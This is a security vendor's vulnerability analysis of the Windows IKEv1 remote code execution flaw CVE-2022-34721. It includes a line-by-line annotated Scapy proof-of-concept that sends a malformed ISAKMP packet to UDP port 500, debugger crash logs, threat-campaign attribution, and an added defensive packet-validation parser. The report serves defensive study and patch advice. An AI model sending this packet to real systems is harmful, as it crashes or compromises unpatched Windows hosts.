
Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

CYFIRMA 2022, All rights are reserved


Windows Internet Key Exchange (IKE) Remote Code Execution Vulnerability Analysis (CVE-2022-34721)

EXECUTIVE SUMMARY
The CYFIRMA research team observed a series of exploits active in the wild targeting
Windows Internet Key Exchange (IKE) Protocol Extensions. We believe with moderate
confidence that this vulnerability is being utilized by threat actors to target 1000+
systems that are still vulnerable.

CYFIRMA has observed hackers' footprints related to this vulnerability as part of a
campaign “流血你”, translating to “bleed you”, suspected to be operated by unknown
Mandarin-speaking threat actors (confidence: moderate); details are also presented in
this report.

From underground forums, the CYFIRMA Research team also observed unknown
hackers sharing the exploit link which could be used to target vulnerable systems.

INTRODUCTION
A critical vulnerability has been identified in Microsoft Windows Internet Key Exchange
(IKE) Protocol Extensions. This vulnerability (CVE-2022-34721) affects an unidentified part
of the IKE Protocol Extensions component; manipulation of it leads to remote code
execution (RCE). Its vectors are summarized as follows:
• Attack Vector (AV) is Network
• Confidentiality (C) is High
• Integrity (I) is High
• Availability (A) is High

KEY TAKEAWAYS

• The vulnerability lies in the code used to handle the IKEv1 (Internet Key Exchange
version 1) protocol, which is deprecated but retained for compatibility with legacy
systems.

• The POC triggers a memory-corruption issue in the svchost.exe process of the
vulnerable system. With Page Heap (a debugging feature) enabled for the Internet Key
Exchange process, the svchost.exe process hosting the Internet Key Exchange protocol
service crashes while attempting to read data beyond an allocated buffer.

• Microsoft has mapped this issue to CVE-2022-34721 and fixed it by adding a check on
the length of incoming data and skipping processing of that data if the length is too
small.


VULNERABILITY AT A GLANCE
Windows Internet Key Exchange (IKE) Remote Code Execution

CVE-2022-34721

CVSS Score: 9.8

CYFIRMA Risk Rating: Critical

Exploit Detail: Link

Description
The vulnerability is caused by a flaw in the Internet Key Exchange (IKE) Protocol
Extensions component. An attacker could exploit this vulnerability to execute
arbitrary code on the system, by sending a specially crafted IP packet to a
Windows node where IPSec is enabled.

The vulnerability only affects IKEv1; IKEv2 is not affected. However, all Windows
servers are affected because they accept both IKEv1 and IKEv2 packets, which makes the
flaw critical.

AFFECTED VERSIONS

The affected versions are listed as follows:


Name                 Vendor     Start Version   End Version
Windows_server_2008  Microsoft  r2              r2
Windows_server_2012  Microsoft  r2              r2
Windows_10           Microsoft  1607            1607
Windows_8.1          Microsoft  -               -
Windows_server_2016  Microsoft  -               -
Windows_server_2008  Microsoft  -               -
Windows_7            Microsoft  -               -
Windows_rt_8.1       Microsoft  -               -
Windows_server_2012  Microsoft  -               -
Windows_10           Microsoft  -               -
Windows_10           Microsoft  20h2            20h2
Windows_10           Microsoft  21h1            21h1
Windows_10           Microsoft  21h2            21h2
Windows_10           Microsoft  1809            1809
Windows_11           Microsoft  -               -
Windows_11           Microsoft  -               -
Windows_server_2019  Microsoft  -               -
Windows_server_2022  Microsoft  -               -
Windows_server_2022  Microsoft  -               -
Source: Microsoft

EXPLOIT ANALYSIS
CYFIRMA Research team carried out an exploit analysis of this vulnerability.
Details are as below:

from scapy.all import *
from scapy.contrib.ikev2 import *
from scapy.layers.isakmp import *

• Scapy is a powerful Python-based interactive packet manipulation program and
library; scapy.layers.isakmp supplies the ISAKMP and ISAKMP_payload classes used below.

import socket, time

• The socket module provides the socket API used to send messages across a network;
sockets are a form of inter-process communication (IPC).
• time is Python's standard module for time-related tasks; it is imported but not used
by the script as shown.

target = ("target IP address", 500)

• IP address and port of the target vulnerable system; UDP port 500 is the port on
which ISAKMP/IKE listens.

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

• AF_INET is the address family that designates the type of addresses the socket can
communicate with (in this case, Internet Protocol v4 addresses).
• SOCK_DGRAM provides datagrams (UDP): connectionless messages of a fixed maximum
length.


pkt = ISAKMP(init_cookie=RandString(8), next_payload=0x84, exch_type=0xf3)

• The ISAKMP protocol is a framework for dynamically establishing security associations
and cryptographic keys in an Internet environment; ISAKMP() builds its fixed header.
• exch_type=0xf3 (243): the exchange-type field of the header. The crash stack in the
crash logs shows the packet being dispatched through ikeext!IkeHandleMMPacketDispatchAuthip.
• next_payload=0x84 (132): the type of the first payload following the header. The crash
stack shows the packet being handled by the fragment-payload path (ikeext!IkeHandlePayloadFrag).
• RandString(8): a random initiator cookie of eight bytes.

pkt /= ISAKMP_payload(next_payload=0x1, load=b"\x00\x00\x01\x7f")

• ISAKMP_payload appends a generic payload (next-payload byte, reserved byte, 16-bit
length) after the header.
• load is the four-byte payload body 00 00 01 7f.
• next_payload=0x1 declares that another payload (type 1) follows, although none is
appended to the packet.

sock.sendto(raw(pkt), target)

• raw(pkt) assembles the packet into its byte representation.
• sendto sends it as a single UDP datagram to the vulnerable target.
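The following is an added example, not code from the CYFIRMA report or from the POC: a plain-Python (no scapy) validating parser for the ISAKMP header and payload chain that applies the class of length check the Key Takeaways section attributes to the fix, rejecting any payload whose declared length is smaller than its own 4-byte generic header or runs past the bytes received, and any chain that announces a further payload when no bytes remain. The constants, cookies and sample messages are constructed for the example; one sample uses the same field values as the script above and is rejected rather than processed.

```python
import struct

ISAKMP_HDR_LEN = 28    # two 8-byte cookies, next payload, version, exchange type, flags, message id, length
GEN_HDR_LEN = 4        # generic payload header: next payload, reserved, 16-bit payload length
NO_NEXT_PAYLOAD = 0    # next-payload value that terminates the chain

def parse_isakmp(data: bytes):
    """Walk the ISAKMP payload chain with strict length checks; raise ValueError on any inconsistency."""
    if len(data) < ISAKMP_HDR_LEN:
        raise ValueError("truncated ISAKMP header")
    _ic, _rc, next_payload, _ver, exch_type, _flags, _msg_id, length = struct.unpack(
        "!8s8sBBBBII", data[:ISAKMP_HDR_LEN])
    if length != len(data):
        raise ValueError(f"header length {length} != received {len(data)}")
    payloads, offset, ptype = [], ISAKMP_HDR_LEN, next_payload
    while ptype != NO_NEXT_PAYLOAD:
        if len(data) - offset < GEN_HDR_LEN:   # chain announces another payload but nothing is left
            raise ValueError(f"payload type {ptype} header truncated at offset {offset}")
        nxt, _res, plen = struct.unpack("!BBH", data[offset:offset + GEN_HDR_LEN])
        if plen < GEN_HDR_LEN:                  # declared length cannot even cover its own header
            raise ValueError(f"payload type {ptype} length {plen} too small")
        if offset + plen > len(data):           # declared length runs past the bytes received
            raise ValueError(f"payload type {ptype} length {plen} overruns packet")
        payloads.append((ptype, data[offset + GEN_HDR_LEN:offset + plen]))
        offset, ptype = offset + plen, nxt
    if offset != len(data):
        raise ValueError("trailing bytes after last payload")
    return exch_type, payloads

def check(data: bytes):
    """Return (True, (exch_type, payloads)) for a consistent message, else (False, reason)."""
    try:
        return True, parse_isakmp(data)
    except ValueError as err:
        return False, str(err)

def build_packet(exch_type: int, first_payload: int, chain) -> bytes:
    """Assemble a message from [(next_payload, body)]; next_payload is given explicitly so that a
    malformed chain can be constructed as test input. Cookies and version are constructed values."""
    body = b"".join(struct.pack("!BBH", nxt, 0, GEN_HDR_LEN + len(pb)) + pb for nxt, pb in chain)
    hdr = struct.pack("!8s8sBBBBII", b"\x11" * 8, bytes(8), first_payload, 0x10, exch_type, 0, 0,
                      ISAKMP_HDR_LEN + len(body))
    return hdr + body

# Constructed sample messages, not captured traffic.
GOOD = build_packet(0x02, 0x0d, [(NO_NEXT_PAYLOAD, b"\x00\x00\x01\x7f")])   # chain properly terminated
DANGLING = build_packet(0xf3, 0x84, [(0x01, b"\x00\x00\x01\x7f")])          # announces payload 1, none present
UNDERSIZED = GOOD[:ISAKMP_HDR_LEN] + struct.pack("!BBH", 0, 0, 2) + b"\x00\x00\x01\x7f"  # length 2 < 4
```

check() returns the parsed (exchange type, payloads) for a consistent message and the rejection reason otherwise, so it can be dropped into a capture-triage script as-is.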

PROOF OF CONCEPT
The following sections showcase the POC details.

Fig: Victim’s IP address


Fig: Packet Sent from Attacker’s Machine

Fig: Event Logged into the logs from svchost.exe


Fig: IKE and AuthIP IPsec Keying Modules were stopped


Source: ACROS Security

CRASH LOGS
Following are the log details of the memory corruption in svchost caused by the POC.


(128.414): Access violation - code c0000005 (first chance)


First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ikeext!IkeQueueRecvRequest+0x158:
00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax]
ds:0000017a`08459000=????????????????????????????????

0:005> r
rax=0000017a08459000 rbx=0000000000000000 rcx=00000008905fef70
rdx=ffffffffffffc000 rsi=00000008905feff0 rdi=0000017a08456f10
rip=00007ffb9e48d138 rsp=00000008905fef30 rbp=00000008905fefa0
r8=0000000000000000 r9=0000000000000000 r10=0000017a08459000
r11=0000017a08459000 r12=0000000000000000 r13=0000017a0843cb80
r14=0000017a08456f20 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
ikeext!IkeQueueRecvRequest+0x158:
00007ffb`9e48d138 0f1000 movups xmm0,xmmword ptr [rax]
ds:0000017a`08459000=????????????????????????????????

0:005> !heap -p -a @rax
    address 0000017a08459000 found in
    _DPH_HEAP_ROOT @ 17a08281000
    in busy allocation (  DPH_HEAP_BLOCK:     UserAddr     UserSize -     VirtAddr     VirtSize)
                                17a08285a28:  17a08459000         0 -  17a08458000         2000
    ReadMemory error for address 0000017a08459000
00007ffbc8177e7f ntdll!RtlDebugAllocateHeap+0x000000000000003f
00007ffbc811e1fa ntdll!RtlpAllocateHeap+0x000000000009c70a
00007ffbc807fcad ntdll!RtlpAllocateHeapInternal+0x000000000000098d
00007ffb9e486910 ikeext!WfpMemAlloc+0x0000000000000020
00007ffb9e48d0ce ikeext!IkeQueueRecvRequest+0x00000000000000ee
00007ffb9e4f1c0d ikeext!IkeReinjectReassembledPacket+0x0000000000000181
00007ffb9e4f17ed ikeext!IkeInsertFragEntry+0x0000000000000259
00007ffb9e4f1865 ikeext!IkePostPayloadProcessFrag+0x0000000000000031
00007ffb9e4f1564 ikeext!IkeHandlePayloadFrag+0x00000000000000ac
00007ffb9e507652 ikeext!IkeHandleMMPacketDispatchAuthip+0x000000000000005e
00007ffb9e4ead86 ikeext!IkeProcessPacket+0x00000000000002f2
00007ffb9e47fc84 ikeext!IkeProcessPacketDispatch+0x0000000000000fd4
00007ffb9e47bb9c ikeext!IkeHandleRecvRequest+0x000000000000000c
00007ffbc809e7e9 ntdll!TppSimplepExecuteCallback+0x0000000000000099
00007ffbc8086964 ntdll!TppWorkerThread+0x0000000000000644
00007ffbc7cc7974 KERNEL32!BaseThreadInitThunk+0x0000000000000014
00007ffbc80ca2f1 ntdll!RtlUserThreadStart+0x0000000000000021

0:005> dq @rax
0000017a`08459000 ????????`???????? ????????`????????
0000017a`08459010 ????????`???????? ????????`????????
0000017a`08459020 ????????`???????? ????????`????????
0000017a`08459030 ????????`???????? ????????`????????
0000017a`08459040 ????????`???????? ????????`????????
0000017a`08459050 ????????`???????? ????????`????????
0000017a`08459060 ????????`???????? ????????`????????
0000017a`08459070 ????????`???????? ????????`????????

0:005> k
 # Child-SP          RetAddr           Call Site
00 00000008`905fef30 00007ffb`9e4f1c0d ikeext!IkeQueueRecvRequest+0x158
01 00000008`905fefd0 00007ffb`9e4f17ed ikeext!IkeReinjectReassembledPacket+0x181
02 00000008`905ff110 00007ffb`9e4f1865 ikeext!IkeInsertFragEntry+0x259
03 00000008`905ff180 00007ffb`9e4f1564 ikeext!IkePostPayloadProcessFrag+0x31
04 00000008`905ff1c0 00007ffb`9e507652 ikeext!IkeHandlePayloadFrag+0xac
05 00000008`905ff200 00007ffb`9e4ead86 ikeext!IkeHandleMMPacketDispatchAuthip+0x5e
06 00000008`905ff230 00007ffb`9e47fc84 ikeext!IkeProcessPacket+0x2f2
07 00000008`905ff2f0 00007ffb`9e47bb9c ikeext!IkeProcessPacketDispatch+0xfd4
08 00000008`905ff850 00007ffb`c809e7e9 ikeext!IkeHandleRecvRequest+0xc
09 00000008`905ff880 00007ffb`c8086964 ntdll!TppSimplepExecuteCallback+0x99
0a 00000008`905ff8d0 00007ffb`c7cc7974 ntdll!TppWorkerThread+0x644
0b 00000008`905ffbc0 00007ffb`c80ca2f1 KERNEL32!BaseThreadInitThunk+0x14
0c 00000008`905ffbf0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
Source: 78ReserchLab

UNDERGROUND AND DARK WEB FORUMS


From underground forums, CYFIRMA Research team observed unknown
hackers sharing the exploit link which could be used to exploit vulnerable
systems.

Source: Underground Forums


EXTERNAL THREAT LANDSCAPE MANAGEMENT AND CAMPAIGN
Through CYFIRMA-tracked campaigns, we have observed unknown Chinese threat actors in
collaboration with Russian cybercriminals (FIN7), with confidence level moderate,
potentially looking to exploit the weakness in these systems to carry out their
nefarious activities.

Threat actors: Unknown Chinese Threat Actors; Russian Cybercriminals (FIN7)

Campaign Details
CYFIRMA research observed the campaign “流血你”, translating to “bleed you”, suspected to
have been launched on 6 September 2022 and targeting weak/vulnerable Windows OS, Windows
Servers, Windows protocols, and services. The unknown Chinese threat actors identified
these systems as running weak/vulnerable software that could be exploited using existing
exploits.

As part of the campaign, we also noticed Chinese threat actors potentially colluding with
Russian cybercriminals. From a strategic viewpoint on the changing geopolitical scenario,
as seen through external threat landscape management, Russia and China are observed to be
forming a strategic relationship.

Target Industries
• Multiline Retail
• Industrial Conglomerates
• Diversified Financial Services
• IT Services, E-Commerce
• Government

Target Geographies
• USA, UK, Australia, Canada, France, Germany, Turkey, Japan, India, UAE, Israel

Motivation
Exfiltration of sensitive information for financial gain, gaining elevated access, and
causing operational disruption.

TTPs
Exploiting a weakness in the systems, potential malware and ransomware attacks, and
lateral movement within the organization.

CONCLUSION
The analysis done by CYFIRMA research on the Windows Internet Key Exchange (IKE)
Protocol Extensions Remote Code Execution vulnerability provides a detailed
understanding of the POC that attackers could utilize to exploit this vulnerability.
Readers should also take note of the ETLM campaign details uncovered and being tracked
by CYFIRMA.

CYFIRMA advises customers to patch the vulnerability as per the Microsoft advisory as
soon as possible.

CYFIRMA is an external threat landscape management platform company. We combine cyber
intelligence with attack surface discovery and digital risk protection to deliver early
warning, personalized, contextual, outside-in, and multi-layered insights. Our cloud-based
AI and ML-powered analytics platform provides the hacker's view with deep insights into the
external cyber landscape, helping clients prepare for impending attacks. CYFIRMA is
headquartered in Singapore with offices across APAC, US, and EMEA. The company is funded by
Goldman Sachs, Zodius Capital, and Z3 Partners.
